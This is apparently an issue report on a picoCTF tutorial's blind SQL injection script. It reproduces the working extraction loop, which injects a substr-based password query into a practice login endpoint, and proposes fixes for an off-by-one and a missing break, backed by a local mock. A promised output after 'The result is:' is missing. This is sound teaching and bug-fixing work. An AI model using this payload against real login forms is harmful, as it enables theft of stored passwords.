Open
Description
The blind SQL injection code

```python
import requests
from string import printable

accum = ""
for i in range(40):                      # starts at 0, but SQL substr positions start at 1
    for letter in printable:
        accum += letter
        r = requests.post("https://primer.picoctf.org/vuln/web/blindsql.php?&username=WeDontCare&password=' or '"
            + letter + "'=( select substr(binary password," + str(i) + ",1) from pico_blind_injection where id=1 ) and ''= '")
        if 'NOTHING FOUND...' in r.text:
            accum = accum[:-1]
            print("nope")
        else:
            print(f"We found the character: {letter}")  # no break, so the remaining letters are still tried for this position
print(accum)
```

loops using `range(40)`. This iterator starts at 0 instead of 1, which causes one extra loop in the problem.
Also, in the `else` block of `if 'NOTHING FOUND...' in r.text:` there is no `break`, so `substr` keeps being called on a position whose value we already know.
To illustrate this, if we ran this code:

```python
from string import printable
import requests

accum = ""
for i in range(40):
    for letter in printable:
        accum += letter
        r = requests.post(
            "https://primer.picoctf.org/vuln/web/blindsql.php?&username=WeDontCare&password=' or '"
            + letter
            + "'=( select substr(binary password,"
            + str(i)
            + ",1) from pico_blind_injection where id=1 ) and ''= '"
        )
        if "NOTHING FOUND..." in r.text:
            accum = accum[:-1]
            print(f"nope: {letter} i:{i}")   # now also shows which letter and position were tried
        else:
            print(f"We found the character: {letter}")
print(accum)
```

which just adds the `letter` (and `i`) variables to the "nope" we are printing. The result is:
The next problem is that, after a letter is found, the value passed to `substr` isn't updated.

The fix would be to use `range(1, 40)` and to add a `break` after the `else` block ends.
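To measure both defects without touching the server, here is an added example (not code from the primer or from this issue) that replays the same loop against a local stand-in for the request; `SECRET`, `mysql_substr`, `mock_post` and `run_loop` are constructed for this illustration, and the secret is a made-up sample.

```python
from string import printable

SECRET = "p1c0CTF"  # constructed sample password for the mock oracle


def mysql_substr(s, pos, length):
    """Emulate MySQL SUBSTR(s, pos, length): positions are 1-based and
    pos == 0 yields '' (this is the off-by-one behind range(40))."""
    if pos == 0:
        return ""
    if pos < 0:
        pos = len(s) + pos + 1
    if pos < 1 or pos > len(s):
        return ""
    return s[pos - 1:pos - 1 + length]


def mock_post(letter, i, secret=SECRET):
    """Stand-in for requests.post(): returns the body the script inspects."""
    if letter == mysql_substr(secret, i, 1):
        return "Welcome back!"      # injected condition true, a row matched
    return "NOTHING FOUND..."      # condition false, the page's miss marker


def run_loop(positions, break_on_hit, secret=SECRET, alphabet=printable):
    """Replay the issue's loop structure against the mock oracle.
    Returns (recovered, total_queries, redundant_queries), where redundant
    counts queries sent for a position whose character was already known."""
    accum = ""
    queries = redundant = 0
    for i in positions:
        found = False
        for letter in alphabet:
            queries += 1
            if found:
                redundant += 1
            if "NOTHING FOUND..." not in mock_post(letter, i, secret):
                accum += letter
                found = True
                if break_on_hit:
                    break
    return accum, queries, redundant


if __name__ == "__main__":
    print("as in the primer, range(40), no break:", run_loop(range(40), False))
    print("proposed fix, range(1, 40) with break:", run_loop(range(1, 40), True))
```

With a 100-character alphabet the original loop spends 100 queries on position 0, which can never match, plus 521 more re-testing positions that were already known; the fix removes both costs and still recovers the same string.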